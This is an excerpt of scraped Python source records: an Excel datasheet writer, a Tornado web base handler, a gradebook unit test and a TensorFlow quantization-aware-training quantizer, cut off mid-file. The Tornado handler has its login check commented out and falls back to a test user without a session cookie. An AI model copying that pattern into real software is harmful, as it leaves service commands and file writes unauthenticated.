xlsxwriter.Workbook(self.fpath) as writer:\n 
save_param_info(writer, self.params, self.res_dict,\n self.version_info, is_dev=self.is_dev)\n self.save_res_data()\n\n def get_lssig(self):\n self.lr.calculate_lrsig()\n self.lr_res_dic = {}\n for d in self.params['dye_li']:\n self.lr_res_dic[d] = []\n for param, dic1 in self.lr.lr_dict.items():\n for temp, dic2 in dic1.items():\n for dye, dic3 in dic2.items():\n srs_name = f'{param.upper()} ({temp[0]})'\n self.lr_res_dic[dye].append(\n pd.Series(list(dic3.values()), index=dic3.keys(),\n name=srs_name))\n\n def save_res_data(self):\n with pd.ExcelWriter(self.fpath, engine='openpyxl') as writer:\n book = load_workbook(self.fpath)\n writer.book = book\n temp_keys = list(self.params['used_temp'].keys())\n dye_li = []\n for d in self.params['dye_li']:\n if self.params['used_temp'][temp_keys[0]][d] or\\\n self.params['used_temp'][temp_keys[1]][d]:\n dye_li.append(d)\n for dye in dye_li:\n data_table_li = []\n for i, txt in enumerate(['End RFU (L)', 'End RFU (H)']):\n data_table_li.append(\n pd.Series([\n round(absd[-1]) for absd in self.res_dict[\n 'ABSD_array'][temp_keys[i]][dye].values()],\n index=self.res_dict[\n 'ABSD_array'][temp_keys[i]][dye].keys(),\n name=txt)\n )\n for i, txt in enumerate(['RV (L)', 'RV (H)']):\n data_table_li.append(\n pd.Series([round(rv) for rv in self.rv_dict[\n temp_keys[i]][dye].values()], index=self.rv_dict[\n temp_keys[i]][dye].keys(), name=txt)\n )\n self.get_lssig()\n data_table_li.extend(self.lr_res_dic[dye])\n\n data_table_df = pd.concat(data_table_li, axis=1, sort=True)\n data_table_df.insert(\n 4, 'EPR',\n data_table_df['End RFU (L)']/data_table_df['End RFU (H)'])\n data_table_df = data_table_df.fillna('')  # fillna returns a new DataFrame, so assign it back\n data_table_df.to_excel(writer, sheet_name=dye)\n","sub_path":"dsp/save_raw_datasheet.py","file_name":"save_raw_datasheet.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"420556434","text":"# coding:utf8\n\nfrom util.check_fields_util import get_mutual_params\nfrom view.service.service_utils import do_service_command\nfrom datetime import datetime, timedelta\nfrom tornado.web import RequestHandler, Finish\nfrom util.utils import get_remote_ip, json_dumps_util, json_loads_utf8_util\nfrom view.service.service_utils import del_redis_cache\nimport re\nimport os\nfrom util.config_utils import get_config\nfrom settings_cms import (\n COOKIES_KWARGS, SESSION_VALID_TIME, COOKIE_KEY, LOGIN_PATH\n)\nfrom settings_cms import USER_FILES_PATH, STATIC_FILES_PATH, TEST_USER, BASE_DIR\nfrom tornado import template\n\n\ndef get_command_func_dict(pattern, module_ls=list()):\n command_func_dict = dict()\n for module in module_ls:\n module_dict = module.__dict__\n for key in module_dict:\n r = re.search(pattern, key)\n if r:\n command_func_dict[r.group(1)] = module_dict[key]\n return command_func_dict\n\n\nclass ParamsInfo(object):\n def __init__(self, req, user, content, command):\n super(ParamsInfo, self).__init__()\n self.login_id = user.get('user_id', '')\n self.login_name = user.get('user_name', '')\n self.login_type = user.get('user_type', '')\n self.u_num = user.get('u_num', '')\n self.request = req\n self.ip = get_remote_ip(self)\n self.params = {}\n self.req_params = content\n self.user = user\n\n self.params = dict(\n user_agent=req.headers.get('User-Agent', ''), login_name=self.login_name,\n command=command, login_id=self.login_id, login_ip=get_remote_ip(self),\n u_num=self.u_num, url=req.path, content=json_dumps_util(content),\n login_type=self.login_type\n )\n\n self.result 
= dict(success=False, message='无效的请求!')\n\n\nclass BaseHandler(RequestHandler):\n def __init__(self, application, request, **kwargs):\n super(BaseHandler, self).__init__(application, request)\n self._http404_message = 'HTTPError: Error 404'\n self.result = dict(success=False, message='无效的请求!')\n self._command_func_dict = kwargs.get('command_func_dict', {})\n self._command_params_dict = kwargs.get('command_params_dict', {})\n self._after_send_func = kwargs.get('after_send_func', {})\n\n self._cookie_key = COOKIE_KEY\n self._cookie_kwargs = COOKIES_KWARGS\n\n self.user_agent = request.headers.get('User-Agent', '')\n # 请求参数\n self.req_params = {k: v[0] or '' for k, v in request.arguments.iteritems()}\n self.req = request\n self.command = self.req_params.get('command', '')\n self.host = request.host\n self.ip = get_remote_ip(self)\n self.user_dir = os.path.join(USER_FILES_PATH,self.current_user)\n self.project_dir = os.path.join(self.user_dir,'%s','project')\n\n def set_web_cookie(self, data, seconds=SESSION_VALID_TIME):\n if data:\n self.set_secure_cookie(self._cookie_key, json_dumps_util(data),\n **{'expires': datetime.utcnow() + timedelta(seconds=seconds)})\n\n def check_is_logon(self, cookie=None):\n if cookie is None:\n cookie = self.get_cookie_user()\n\n if cookie and isinstance(cookie, dict) and cookie.get('u_num', '') and cookie.get('user_id', ''):\n self.set_web_cookie(cookie)\n return True\n return False\n\n def get_cookie_user(self):\n cookie = {}\n try:\n cookie = json_loads_utf8_util(self.get_secure_cookie(self._cookie_key))\n if cookie:\n self.set_web_cookie(cookie)\n except:\n cookie = {}\n finally:\n return cookie\n\n def clear_cookie_and_redis(self, key, name_list=None):\n \"\"\"\n 清空 cookie 对应键值\n 删除 redis_cache 对应缓存数据 (可选)\n \"\"\"\n if name_list is not None and isinstance(name_list, list) and len(name_list) > 0:\n del_redis_cache(name_list)\n self.clear_cookie(key)\n\n def render_2(self, template_name, **kwargs):\n self.set_header(\"Cache-Control\", \"no-cache\")\n self.render(template_name, **kwargs)\n\n def update_page(self, client='web', page='index'):\n user = self.get_cookie_user().get('user_name', TEST_USER)\n config = get_config(user)\n html = self.render_string('template.html', user=user, config=config, page=page)\n folder = os.path.join(USER_FILES_PATH, user, client, 'html')\n if not os.path.exists(folder):\n os.makedirs(folder)\n path = os.path.join(folder, page + '.html')\n try:\n open(path, 'w').write(html)\n return True\n except:\n return False\n\n def render_by_user(self, template_name):\n user_agent = self.request.headers['User-Agent']\n client = 'web'\n if 'Android' in user_agent or 'iPhone' in user_agent:\n client = 'app'\n user = self.current_user\n folder = os.path.join(USER_FILES_PATH, user, client, 'html')\n path = os.path.join(folder, template_name)\n if user and os.path.exists(path):\n loader = template.Loader(folder)\n html = loader.load(template_name).generate()\n self.write(html)\n else:\n self.render(template_name)\n\n def get_current_user(self):\n return self.get_cookie_user().get('user_name', TEST_USER)\n\n def get(self, *args, **kwargs):\n if not self.current_user:\n url = self.request.uri\n redirect_url = url\n if '?' 
not in url:\n redirect_url = '/login' + '?next=' + url\n self.redirect(redirect_url)\n raise Finish()\n\n def post(self, *args, **kwargs):\n pass\n\n\nclass BaseCmsHandler(BaseHandler):\n def get(self, *args, **kwargs):\n pass\n\n def post(self, *args, **kwargs):\n # user = self.get_cookie_user()\n # if not (user and user.get('u_num', '')):\n # self.redirect_login('会话失效,请重新登入')\n # else:\n # self.command_info()\n self.command_info()\n user = self.get_cookie_user().get('user_name', TEST_USER)\n client = self.request.arguments.get('client', ['web'])[0]\n self.update_page(client)\n\n def redirect_login(self, msg=None):\n msg = msg or '会话失效,请重新登入'\n self.clear_cookie_and_redis(self._cookie_key)\n if str(self.request.method).upper() == 'POST':\n self.write(dict(success=False, message=msg))\n else:\n self.write(dict(success=True, message=msg))\n # self.redirect(LOGIN_PATH)\n\n def command_info(self):\n user = self.get_cookie_user()\n uris = str(self.request.path).split('/')\n module = uris[2] if uris else ''\n operate = uris[3] if len(uris) > 3 else ''\n command = self.req_params.get('command', '')\n command_dict = self._command_params_dict.get(module, {}).get(operate, {}).get(command, {})\n if command_dict:\n content = get_mutual_params(self.req_params, command_dict)\n result = dict(success=False, message='操作异常![-11]', error_code=0)\n if not isinstance(content, dict):\n result['message'] = content\n else:\n func = self._command_func_dict.get(command)\n if func:\n result = do_service_command(func, ParamsInfo(self.request, user, content, command))\n\n after_func = self._after_send_func.get(command)\n if after_func:\n after_func(self, result, self.req_params)\n else:\n self.write(result)\n else:\n self.write(self.result)\n","sub_path":"view/handler/base_handler.py","file_name":"base_handler.py","file_ext":"py","file_size_in_byte":7780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"566868515","text":"# Copyright 2021 UW-IT, University of Washington\n# SPDX-License-Identifier: Apache-2.0\n\nfrom unittest import TestCase\nfrom uw_sws.section import get_section_by_label\nfrom uw_pws import PWS\nfrom uw_sws.util import fdao_sws_override\nfrom uw_pws.util import fdao_pws_override\nfrom uw_catalyst.util import fdao_catalyst_override\nfrom uw_catalyst.gradebook import *\nfrom uw_catalyst.exceptions import InvalidGradebookID\nimport mock\n\n\n@fdao_sws_override\n@fdao_pws_override\n@fdao_catalyst_override\nclass CatalystTestGradebook(TestCase):\n def test_invalid_gradebook_id(self):\n self.assertRaises(\n InvalidGradebookID, get_participants_for_gradebook, None)\n self.assertRaises(\n InvalidGradebookID, get_participants_for_gradebook, '')\n self.assertRaises(\n InvalidGradebookID, get_participants_for_gradebook, 'abc')\n self.assertRaises(\n InvalidGradebookID, get_gradebook_export, 00000)\n self.assertRaises(\n InvalidGradebookID, get_gradebook_export, 11111111111)\n\n @mock.patch('uw_catalyst.gradebook.get_resource')\n def test_gradebook_export(self, mock_fn):\n person = PWS().get_person_by_netid('bill')\n\n response = get_gradebook_export(12345, person)\n\n mock_fn.assert_called_with('/rest/gradebook/v1/book/12345/export', {\n 'Accept': 'application/vnd.ms-excel',\n 'X-UW-Act-as': 'bill'})\n\n def test_participants_for_gradebook(self):\n person = PWS().get_person_by_netid('bill')\n\n participants = get_participants_for_gradebook(12345, person)\n\n self.assertEquals(len(participants), 3, 'Correct participant count')\n\n def 
test_participants_for_section(self):\n section = get_section_by_label('2013,summer,CSS,161/A')\n instructor = section.meetings[0].instructors[0]\n\n participants = get_participants_for_section(section, instructor)\n\n self.assertEquals(len(participants), 3, 'Correct participant count')\n","sub_path":"uw_catalyst/tests/test_gradebook.py","file_name":"test_gradebook.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"648262000","text":"from __future__ import print_function\nimport tensorflow as tf\nimport numpy as np\n\nfrom ..common import MNN_compression_pb2 as compress_pb\nimport mnncompress\nfrom mnncompress.common.log import mnn_logger\nfrom mnncompress.common.helper import get_pipeline_methods\nimport uuid\nfrom .helpers import get_input_tensor_index, is_weight_tensor, get_variable_by_tensor\nfrom .helpers import find_quant_output_tensor, find_bias_add_op, get_batch_norm_statistics, get_variable_by_name\nfrom .graph_checker import check_for_grad_ops\n\n\n_MNN_compress_scope = 'MNN_QAT_'\n\n_MNN_mark_start_name = 'MNN_QAT_MARK_START'\n_MNN_mark_end_name = 'MNN_QAT_MARK_END'\n\n_MNN_variable_collection_name = 'MNN_QAT_variables'\n\ndef MNN_QAT_variables():\n all_vars = tf.global_variables()\n return [v for v in all_vars if 'MNN_QAT' in v.name]\n\n_Quant_Support_Ops = ['Conv2D', 'DepthwiseConv2dNative', 'MatMul']\n\n_Variable_types = ['Variable', 'VariableV2']\n\n_MNN_QAT_DEBUG = False\n\n\ndef strip_MNN_QAT_ops(graph):\n '''only invoke this when you need to save the model for inference'''\n def get_MNN_QAT_scope(name, match):\n name_split = name.split('/')\n for i in range(len(name_split)):\n if name_split[i] == match:\n assert i > 0, \"get MNN QAT scope error\"\n return name_split[i-1]\n return ''\n\n all_ops = graph.get_operations()\n start_op_names = [op.name for op in all_ops if op.name.endswith(_MNN_mark_start_name) and op.type in ['Abs', 'RealDiv'] and 'gradients/' not in op.name]\n end_op_names = [op.name for op in all_ops if op.name.endswith(_MNN_mark_end_name+'/Merge') and op.type == 'Merge' and 'gradients/' not in op.name]\n\n for start_name in start_op_names:\n start_scope = get_MNN_QAT_scope(start_name, _MNN_mark_start_name)\n end_name = ''\n for end in end_op_names:\n if start_scope in end:\n end_name = end\n break\n assert end_name != '', \"error: end op name not found\"\n\n start_op = graph.get_operation_by_name(start_name)\n start_input_tensor = start_op.inputs[0]\n end_tensor = graph.get_tensor_by_name(end_name+':0')\n end_consumers = end_tensor.consumers()\n\n for c in end_consumers:\n indices = get_input_tensor_index(c, end_tensor)\n for id in indices:\n c._update_input(id, start_input_tensor)\n\ndef debug_print(*argv):\n if _MNN_QAT_DEBUG:\n print(\"debug info: \", end=\"\")\n for arg in argv:\n print(arg, end=' ')\n print()\n\ndef get_qat_state_placeholder(graph=None):\n if graph is None:\n graph = tf.get_default_graph()\n\n all_tensor_names = [tensor.name for op in graph.get_operations() for tensor in op.values()]\n for name in all_tensor_names:\n if 'MNN_QAT_is_training:0' in name:\n return graph.get_tensor_by_name(name)\n\n raise ValueError('Could not find QAT state placeholder')\n\n\nclass EMAQuantizer(object):\n def __init__(self, graph=None, is_training = None, skip_quant_layers = [], skip_quant_flag = [], bits = 8, debug_info = False, retain_sparsity=False):\n if graph is None:\n self._graph = tf.get_default_graph()\n else:\n self._graph = graph\n self._ops = 
self._graph.get_operations()\n self.skip_quant_layers = skip_quant_layers\n self.skip_quant_flag = skip_quant_flag\n self._all_conv_and_matmul_layers = [l for l in self._ops if l.type in _Quant_Support_Ops]\n self.quant_layer_names = [l.name for l in self._all_conv_and_matmul_layers]\n\n skip_flag_usable = False\n for sf in self.skip_quant_flag:\n for item in self.quant_layer_names:\n if sf in item:\n self.skip_quant_layers.append(item)\n skip_flag_usable = True\n \n if skip_quant_flag != [] and skip_flag_usable == False:\n raise ValueError(\"skip_quant_flag invalid\")\n\n for item in self.skip_quant_layers:\n if item in [l.name for l in self._all_conv_and_matmul_layers]:\n self.quant_layer_names.remove(item)\n else:\n raise ValueError(item+\" not found in graph ops, availables are: \"+str([l.name for l in self._all_conv_and_matmul_layers]))\n\n if bits < 2 or bits > 8:\n raise ValueError(\"bits must be a integer in [2, 8]\")\n self.bits = bits\n self._clamp_value = float(pow(2, bits-1) - 1)\n\n global _MNN_QAT_DEBUG\n _MNN_QAT_DEBUG = debug_info\n\n self._retain_sparsity = retain_sparsity\n self._momentum = 0.99\n if is_training is not None:\n if not isinstance(is_training, bool):\n raise ValueError(\"is_training should be None or python bool\")\n if isinstance(is_training, bool):\n self._is_training = tf.constant(is_training)\n else:\n print(\"is_training set as: tf.placeholder(tf.bool, name='MNN_QAT_is_training')\")\n self._is_training = tf.placeholder(tf.bool, name='MNN_QAT_is_training')\n self._original_tensor_consumer_index_map = {}\n self._quant_tensor_consumer_index_map = {}\n self._feature_scale_original_tensor_dims_map = {}\n self._weight_scale_original_tensor_map = {}\n self._model_per_layer_scale_info = []\n self._prune_weight_ops = []\n self._mask = {}\n self._all_weight_tensors = []\n self._feature_scale_init_op = {}\n self._op_scale_initialized = {}\n self._initialized = False\n self._layer_input_clamp_value = {}\n self._eps = 1e-9\n self._reported = False\n self._total_weight_num = 0.0\n self._remain_weight_num = 0.0\n self._init_prune_ratios = {}\n self._op_name_weight_tensor = {}\n self._skip_quant_weight_tensors = []\n self._find_all_variable_tensors()\n self._insert_quant_ops()\n\n @property\n def is_training(self):\n return self._is_training\n\n def init(self, sess):\n self._initialized = True\n\n for name in self.skip_quant_layers:\n if name in self._op_name_weight_tensor.keys():\n weight_tensor = self._op_name_weight_tensor[name]\n self._skip_quant_weight_tensors.append(weight_tensor)\n \n for v in self._all_weight_tensors:\n self._mask[v] = sess.run(self._mask[v])\n self._init_prune_ratios[v.name] = 1. 
- np.mean(self._mask[v])\n self._total_weight_num += self._mask[v].size\n if v in self._skip_quant_weight_tensors:\n self._remain_weight_num += self._mask[v].size * (1 - self._init_prune_ratios[v.name]) / 4.0\n else:\n self._remain_weight_num += self._mask[v].size * (1 - self._init_prune_ratios[v.name]) / (32.0 / self.bits)\n\n def update(self, sess):\n if not self._initialized:\n raise RuntimeError(\"EMAQuantizer is not initialized; call the 'init(sess)' method before the training loop\")\n if self._retain_sparsity:\n sess.run(self._prune_weight_ops)\n if _MNN_QAT_DEBUG:\n for v in self._all_weight_tensors:\n weight = sess.run(v)\n prune_ratio = 1 - np.mean(np.abs(weight) > self._eps)\n print(v, \"prune_ratio:\", prune_ratio)\n\n def _generate_mask_and_prune_ops(self, v):\n if self._retain_sparsity:\n th = self._eps\n else:\n th = -1.0\n \n self._mask[v] = tf.cast(tf.abs(v) > th, tf.float32)\n\n if isinstance(v, tf.Tensor):\n return\n \n if self._retain_sparsity:\n prune_weight_op = tf.assign(v, v * self._mask[v])\n self._prune_weight_ops.append(prune_weight_op)\n\n def _find_all_variable_tensors(self):\n for op in self._all_conv_and_matmul_layers:\n if op.type in ['Conv2D', 'DepthwiseConv2dNative']:\n weight_tensor = get_variable_by_tensor(op.inputs[1])\n self._all_weight_tensors.append(weight_tensor)\n self._op_name_weight_tensor[op.name] = weight_tensor\n self._generate_mask_and_prune_ops(weight_tensor)\n\n if op.type == 'MatMul':\n find_weight = False\n for i in range(len(op.inputs)):\n input_tensor = op.inputs[i]\n if is_weight_tensor(input_tensor):\n find_weight = True\n weight_tensor = get_variable_by_tensor(input_tensor)\n self._all_weight_tensors.append(weight_tensor)\n self._op_name_weight_tensor[op.name] = weight_tensor\n self._generate_mask_and_prune_ops(weight_tensor)\n \n if not find_weight:\n if op.name in self.quant_layer_names:\n self.quant_layer_names.remove(op.name)\n print(\"no weight found for {}, skip\".format(op.name))\n\n def strip_qat_ops(self):\n '''only invoke this when you need to save the model for inference'''\n for tensor in self._original_tensor_consumer_index_map.keys():\n for index, consumer in self._original_tensor_consumer_index_map[tensor]:\n consumer._update_input(index, tensor)\n debug_print(\"on save:\", tensor.name, consumer.name, consumer.type, index)\n\n def save_compress_params(self, filename, sess, append=False):\n def get_save_tensor_name(name):\n if name.endswith(':0'):\n return name[:-2]\n else:\n return name\n\n compress_proto = compress_pb.Pipeline()\n\n if append:\n with open(filename, 'rb') as f:\n compress_proto.ParseFromString(f.read())\n\n pop_index = []\n for i in range(len(compress_proto.algo)):\n if compress_proto.algo[i].type == compress_pb.CompressionAlgo.CompressionType.QUANTIZE:\n pop_index.append(i)\n for i in reversed(pop_index):  # pop from the back so the earlier indices stay valid\n compress_proto.algo.pop(i)\n\n compress_proto.version = \"0.0.0\"\n if compress_proto.mnn_uuid == '':\n self._guid = str(uuid.uuid4())\n compress_proto.mnn_uuid = self._guid\n else:\n self._guid = compress_proto.mnn_uuid\n quant_algorithm = compress_proto.algo.add()\n for layer_info in self._model_per_layer_scale_info:\n l = quant_algorithm.quant_params.layer.add()\n # {\"weight_info\": weight_tensor_scale, \"input_info\": input_scale_and_dim, \"output_info\": output_scale_and_dim}\n weight_info = layer_info[\"weight_info\"]\n input_info = layer_info[\"input_info\"]\n output_info = layer_info[\"output_info\"]\n\n if weight_info:  # skip layers that recorded no weight params\n weight_params = compress_pb.LayerQuantizeParams.WeightParams()\n 
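# Batch-norm gamma and running variance are folded into the per-channel weight scales written below.\n 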
weight_params.name = get_save_tensor_name(get_variable_by_tensor(weight_info[0]).name)\n scales = sess.run(weight_info[1])\n scales = scales.reshape((scales.size))\n bn_stat = layer_info[\"bn_stat\"]\n\n gamma = np.ones_like(scales)\n if bn_stat[0] is not None:\n gamma = sess.run(bn_stat[0])\n gamma = gamma.reshape((gamma.size))\n rstd = np.ones_like(scales)\n if bn_stat[3] is not None:\n bn_var = sess.run(bn_stat[3])\n bn_var = bn_var.reshape((bn_var.size))\n rstd = 1. / np.sqrt(bn_var + bn_stat[4])\n scales = scales * gamma * rstd\n\n for s in scales:\n weight_params.scales.append(abs(s))\n weight_params.bits = self.bits\n weight_params.clamp_min = -int(self._clamp_value)\n weight_params.clamp_max = int(self._clamp_value)\n l.weight.append(weight_params)\n\n input_params = compress_pb.LayerQuantizeParams.ActivationParams()\n input_params.name = get_save_tensor_name(input_info[0].name)\n scale = sess.run(input_info[1]).tolist()\n debug_print(input_info[1].name, scale)\n # for count in range(input_info[2]):\n input_params.scales.append(scale)\n if len(input_info) == 4:\n clamp = sess.run(input_info[3]).tolist()\n input_params.clamp_min = -int(clamp)\n input_params.clamp_max = int(clamp)\n l.input.append(input_params)\n\n if len(input_info) == 6:\n input_params2 = compress_pb.LayerQuantizeParams.ActivationParams()\n input_params2.name = get_save_tensor_name(input_info[3].name)\n scale = sess.run(input_info[4]).tolist()\n debug_print(input_info[4].name, scale)\n for count in range(input_info[5]):\n input_params2.scales.append(scale)\n l.input.append(input_params2)\n \n output_params = compress_pb.LayerQuantizeParams.ActivationParams()\n output_params.name = get_save_tensor_name(output_info[0].name)\n scale = sess.run(output_info[1])\n debug_print(output_info[1].name, scale)\n # for count in range(output_info[2]):\n output_params.scales.append(scale)\n if len(output_info) == 4:\n clamp = sess.run(output_info[3]).tolist()\n output_params.clamp_min = -int(clamp)\n output_params.clamp_max = int(clamp)\n l.output.append(output_params)\n\n if not self._reported:\n detail = {\"algorithm\": \"EMAQ\", \"pipeline\": get_pipeline_methods(compress_proto), \"compression_rate\": self._total_weight_num / self._remain_weight_num, \\\n \"ori_model_size\": self._total_weight_num * 4.0 / 1024.0 / 1024.0, \\\n \"config\": {\"bits\": self.bits, \"skip_quant_layers\": self.skip_quant_layers, \"init_prune_ratios\": self._init_prune_ratios}}\n self._reported = mnn_logger.on_done(\"tensorflow\", self._guid, detail)\n\n with tf.gfile.Open(filename, mode=\"wb\") as f:\n f.write(compress_proto.SerializeToString())\n\n print(\"compress proto saved to:\", filename)\n\n def _recover_train_quant_graph(self):\n if self._quant_tensor_consumer_index_map == {}:\n return\n \n for tensor in self._quant_tensor_consumer_index_map.keys():\n for index, consumer in self._quant_tensor_consumer_index_map[tensor]:\n consumer._update_input(index, tensor)\n debug_print(\"on recover:\", consumer.name, consumer.type, index, tensor.name)\n\n def _insert_quant_ops(self):\n grad_ops = check_for_grad_ops(self._graph)\n if grad_ops:\n raise ValueError('gradient op found in graph, exiting %s\\nplease invoke with inference graph only. 
create quantizer before construct model optimizer\\n' % grad_ops)\n scope_index = -1\n for layer_name in self.quant_layer_names:\n if 'gradients/' in layer_name and '_grad' in layer_name:\n continue\n scope_index += 1\n self._quant_one_layer(layer_name, _MNN_compress_scope + str(scope_index))\n\n def _quant_one_layer(self, layer_name, scope):\n all_op_names_ops = {op.name : op for op in self._ops}\n if layer_name not in all_op_names_ops.keys():\n raise ValueError(\"%s is not in the graph.\" % layer_name)\n\n if all_op_names_ops[layer_name].type not in _Quant_Support_Ops:\n raise ValueError(\"op name: %s, type = %s is not supported.\" % (layer_name, all_op_names_ops[layer_name].type))\n\n if layer_name not in self._layer_input_clamp_value.keys():\n self._layer_input_clamp_value[layer_name] = None\n\n if all_op_names_ops[layer_name].type == 'Conv2D' or all_op_names_ops[layer_name].type == 'DepthwiseConv2dNative':\n print(\"fake quant\", layer_name, all_op_names_ops[layer_name].type)\n depthwise = False\n if all_op_names_ops[layer_name].type == 'DepthwiseConv2dNative':\n depthwise = True\n self._op_scale_initialized[all_op_names_ops[layer_name]] = {}\n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n self._op_scale_initialized[all_op_names_ops[layer_name]]['input'] = tf.get_variable(name=layer_name+'_input_scale_initialized', initializer=0, trainable=False)\n self._op_scale_initialized[all_op_names_ops[layer_name]]['output'] = tf.get_variable(name=layer_name+'_output_scale_initialized', initializer=0, trainable=False)\n tf.add_to_collection(_MNN_variable_collection_name, self._op_scale_initialized[all_op_names_ops[layer_name]]['input'])\n tf.add_to_collection(_MNN_variable_collection_name, self._op_scale_initialized[all_op_names_ops[layer_name]]['output'])\n res = self._quant_conv(all_op_names_ops[layer_name], scope, depthwise)\n self._model_per_layer_scale_info.append(res)\n\n if all_op_names_ops[layer_name].type == 'MatMul':\n print(\"fake quant\", layer_name, all_op_names_ops[layer_name].type)\n self._op_scale_initialized[all_op_names_ops[layer_name]] = {}\n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n self._op_scale_initialized[all_op_names_ops[layer_name]]['input'] = tf.get_variable(name=layer_name+'_input_scale_initialized', initializer=0, trainable=False)\n self._op_scale_initialized[all_op_names_ops[layer_name]]['output'] = tf.get_variable(name=layer_name+'_output_scale_initialized', initializer=0, trainable=False)\n tf.add_to_collection(_MNN_variable_collection_name, self._op_scale_initialized[all_op_names_ops[layer_name]]['input'])\n tf.add_to_collection(_MNN_variable_collection_name, self._op_scale_initialized[all_op_names_ops[layer_name]]['output'])\n res = self._quant_matmul(all_op_names_ops[layer_name], scope)\n self._model_per_layer_scale_info.append(res)\n\n def _get_weight_variable_name(self, tensor):\n return tensor.op.inputs[0].op.name\n\n def _save_original_tensor_consumer_info(self, input_tensor, index, consumer_op):\n if input_tensor in self._original_tensor_consumer_index_map.keys():\n self._original_tensor_consumer_index_map[input_tensor].append([index, consumer_op])\n else:\n self._original_tensor_consumer_index_map[input_tensor] = [[index, consumer_op]]\n\n def _save_quant_tensor_consumer_info(self, input_tensor, index, consumer_op):\n if input_tensor in self._quant_tensor_consumer_index_map.keys():\n self._quant_tensor_consumer_index_map[input_tensor].append([index, consumer_op])\n else:\n self._quant_tensor_consumer_index_map[input_tensor] = [[index, 
consumer_op]]\n\n def _get_quant_scope(self, name, match):\n name_split = name.split(\"/\")\n return_scope = ''\n for i in range(len(name_split)):\n cond1 = _MNN_compress_scope in name_split[i]\n cond2 = match in name_split[i]\n if cond1 and cond2:\n for j in range(i+1):\n return_scope = return_scope + name_split[j] + '/'\n \n return return_scope[:-1]\n\n return return_scope\n\n def _quant_conv(self, conv2d_op, scope, depthwise):\n input_feature = conv2d_op.inputs[0]\n weight_tensor = conv2d_op.inputs[1]\n\n reduce_dims = [0, 1, 2]\n if depthwise:\n reduce_dims = [0, 1, 3]\n\n weight_tensor_scale = []\n input_scale_and_dim = []\n output_scale_and_dim = []\n\n input_scale = None\n weight_scales = None\n output_scale = None\n init_moving_scale_op = None\n\n if _MNN_compress_scope not in input_feature.name:\n conv2d_op_input, input_scale, dims, init_moving_scale_op = self._fake_quant_feature(input_feature, scope + '_input', conv2d_op, 'input')\n input_scale_and_dim.append(input_feature)\n input_scale_and_dim.append(input_scale)\n input_scale_and_dim.append(dims)\n conv2d_op._update_input(0, conv2d_op_input)\n self._save_quant_tensor_consumer_info(conv2d_op_input, 0, conv2d_op)\n self._save_original_tensor_consumer_info(input_feature, 0, conv2d_op)\n else:\n pre_output_scope = self._get_quant_scope(input_feature.name, '_output')\n pre_output_scale_name = pre_output_scope + '/moving_average_scale'\n pre_output_scale = get_variable_by_name(pre_output_scale_name)\n input_scale = pre_output_scale\n init_moving_scale_op = self._feature_scale_init_op[pre_output_scale]\n assert pre_output_scale in self._feature_scale_original_tensor_dims_map.keys()\n input_scale_and_dim.append(self._feature_scale_original_tensor_dims_map[pre_output_scale][0])\n input_scale_and_dim.append(pre_output_scale)\n input_scale_and_dim.append(self._feature_scale_original_tensor_dims_map[pre_output_scale][1])\n\n debug_print(\"pre_output_scale:\", pre_output_scale, pre_output_scale.name)\n debug_print(pre_output_scale in self._feature_scale_original_tensor_dims_map)\n debug_print(self._feature_scale_original_tensor_dims_map[pre_output_scale])\n debug_print(input_feature.name, \"feature already quant\")\n\n # if _MNN_compress_scope not in weight_tensor.name:\n new_weight_tensor, weight_scales = self._fake_quant_weight(weight_tensor, reduce_dims, scope + '_weight')\n weight_tensor_scale = [weight_tensor, weight_scales]\n conv2d_op._update_input(1, new_weight_tensor)\n self._save_quant_tensor_consumer_info(new_weight_tensor, 1, conv2d_op)\n self._save_original_tensor_consumer_info(weight_tensor, 1, conv2d_op)\n\n bias_add_op = find_bias_add_op(conv2d_op)\n if bias_add_op is not None:\n for index in range(len(bias_add_op.inputs)):\n input_tensor = bias_add_op.inputs[index]\n if is_weight_tensor(input_tensor):\n debug_print(\"found bias:\", input_tensor.name, \"index:\", index)\n new_bias = self._fake_quant_bias(input_tensor, input_scale, weight_scales, scope + '_bias_' + str(index), init_moving_scale_op)\n bias_add_op._update_input(index, new_bias)\n self._save_quant_tensor_consumer_info(new_bias, index, bias_add_op)\n self._save_original_tensor_consumer_info(input_tensor, index, bias_add_op)\n\n output_tensor = find_quant_output_tensor(conv2d_op)\n output_consumers = output_tensor.consumers()\n # if _MNN_compress_scope not in output_consumers[0].name:\n new_output_tensor, output_scale, dims, init_moving_scale_op = self._fake_quant_feature(output_tensor, scope + '_output', conv2d_op, 'output')\n 
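# Keep the original output tensor together with its moving-average scale; a following quantized layer looks this scale up by scope and reuses it as its input scale.\n 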
output_scale_and_dim.append(output_tensor)\n output_scale_and_dim.append(output_scale)\n output_scale_and_dim.append(dims)\n for c in output_consumers:\n index = get_input_tensor_index(c, output_tensor)\n for id in index:\n c._update_input(id, new_output_tensor)\n self._save_quant_tensor_consumer_info(new_output_tensor, id, c)\n self._save_original_tensor_consumer_info(output_tensor, id, c)\n\n input_scale_and_dim.append(tf.constant(self._clamp_value))\n output_scale_and_dim.append(tf.constant(self._clamp_value))\n\n bn_stat = get_batch_norm_statistics(conv2d_op)\n\n return {\"weight_info\": weight_tensor_scale, \"input_info\": input_scale_and_dim, \"output_info\": output_scale_and_dim, \"bn_stat\": bn_stat}\n \n def _quant_matmul(self, matmul_op, scope):\n weight_tensor_scale = []\n input_scale_and_dim = []\n output_scale_and_dim = []\n\n input_scale = None\n weight_scales = None\n output_scale = None\n init_moving_scale_op = None\n\n for index in range(len(matmul_op.inputs)):\n input_tensor = matmul_op.inputs[index]\n if is_weight_tensor(input_tensor):\n debug_print(input_tensor.name, \"is weight tensor\")\n # if _MNN_compress_scope not in input_tensor.name:\n reduce_dims = None\n trans_a = matmul_op.get_attr(\"transpose_a\")\n trans_b = matmul_op.get_attr(\"transpose_b\")\n if index == 0:\n if not trans_a:\n reduce_dims = [1]\n else:\n reduce_dims = [0]\n if index == 1:\n if not trans_b:\n reduce_dims = [0]\n else:\n reduce_dims = [1]\n\n new_weight_tensor, weight_scales = self._fake_quant_weight(input_tensor, reduce_dims, scope + '_weight_' + 